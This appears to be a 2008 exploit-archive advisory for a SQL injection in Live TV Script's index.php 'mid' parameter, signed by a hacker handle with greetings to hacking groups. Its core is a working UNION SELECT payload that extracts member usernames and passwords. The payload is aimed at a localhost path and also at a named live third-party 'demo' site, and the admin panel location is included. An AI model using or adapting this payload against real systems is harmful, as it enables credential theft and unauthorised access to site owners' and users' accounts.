Live TV Script (index.php mid) SQL Injection Vulnerability

2008-09-09 19:01:03

[~] Live TV Script
[~]
[~] index.php (mid) SQL inj.
[~]
[~] script home: http://livetvscript.com
[~]
[~] Download : no download, because only sale
[~]
[~] Buy now: http://livetvscript.com/order.php
[~]
[~] Dork: n/a
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 09.09.2008
[~]
[~] contact: [email protected]
[~]
[~] contact: [email protected]
[~]
[~] N0T: msn ekleyipte densiz densiz konusanIn sulalesini cumle alem ... : ( (
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------
[~] Exploit :
[~]
[~] http://localhost/script_path/index.php?mid=32+union+select+0,concat(username,0x3a,password),2,3+from+members--
[~]
[~] Demo:
[~]
[~] http://indiaportal.org/demo/index.php?mid=32+union+select+0,concat(username,0x3a,password),2,3+from+members--
[~]
[~] Admin Panel:
[~]
[~] http://localhost/script_path/siteadmin/
[~]
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
[~]
[~] http://www.z0rlu.blogspot.com online : )
[~]
[~] home: yildirimordulari.org & r00tsecurity.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.